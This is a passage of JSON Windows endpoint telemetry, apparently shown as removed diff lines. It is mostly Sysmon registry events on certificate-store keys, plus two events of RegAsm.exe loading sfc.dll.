"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866530000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, 
- "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 
}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 